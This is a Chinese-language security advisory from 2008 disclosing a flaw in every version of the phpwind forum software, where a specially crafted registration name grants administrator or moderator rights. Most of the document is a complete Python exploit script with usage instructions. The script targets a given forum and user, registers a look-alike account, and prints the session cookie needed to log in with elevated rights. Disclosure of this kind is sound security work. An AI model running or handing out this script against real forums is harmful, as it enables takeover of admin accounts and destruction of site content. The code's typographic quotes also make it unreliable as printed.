phpwind管理权限泄露漏洞利用程序发布

    漏洞发布:http://www.80sec.com/ 
    漏洞作者:jianxin@80sec.com 
    漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本 
    漏洞危害:高 
    漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作 

    利用方式:http://www.80sec.com有提供exploit 
    漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限 
    漏洞修补:建议关闭注册功能等待官方出补丁 
    漏洞状态: 
    08.5.25发现此漏洞 
    08.6.1由80sec.com公开此漏洞 

    暂无补丁 

    原始地址:http://www.80sec.com/release/phpwind-exploit.txt 

    漏洞测试: 

    复制代码 代码如下:

    # -*- coding: gb2312 -*-  
    import urllib2,httplib,sys  
    httplib.HTTPConnection.debuglevel = 1  
    cookies = urllib2.HTTPCookieProcessor()  
    opener = urllib2.build_opener(cookies)   

    def banner():  
        print “”  
        print “########################################################”  
        print “Phpwind所有版本管理权限泄露漏洞利用poc”  
        print “Copyright (C) 2006”  
        print “jianxin@80sec.com”  
        print “80sec是一个新的致力于web安全的小团体”  
        print “http://www.80sec.com”   

    def usage():  
        banner()  
        print “Usage:\n”  
        print ”   $ ./phpwind.py pwforumurl usertoattack\n”  
        print ”   pwforumurl    目标论坛地址如http://www.80sec.com/”  
        print ”   usertoattack    目标拥有权限的斑竹或管理员”  
        print ”   攻击结果将会在目标论坛注册一个和目标用户一样的帐户”  
        print ”   最新版本可以使用uid登陆”  
        print ”   其他版本可以使用cookie+useragent登陆”  
        print “########################################################”  
        print “”   

    argvs=sys.argv  
    usage()   

    data = “regname=%s%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=foo@foo.com&regemailtoall=1&step=2” % (argvs[2],”%c1″)  
    pwurl = “%s/register.php” % argvs[1]   

    request = urllib2.Request(  
        url     = pwurl ,  
            headers = {‘Content-Type’ : ‘application/x-www-form-urlencoded’,’User-Agent’: ’80sec owned this’},  
            data    = data)   

    f=opener.open(request)  
    headers=f.headers.dict  
    cookie=headers[“set-cookie”]  
    try:  
        if cookie.index(‘winduser’):  
            print “Exploit Success!”  
            print “Login with uid password @80sec or Cookie:”  
            print cookie  
            print “User-agent: 80sec owned this”  
    except:  
        print “Error! http://www.80sec.com”  
        print “Connect root#80sec.com”

发表评论

发表评论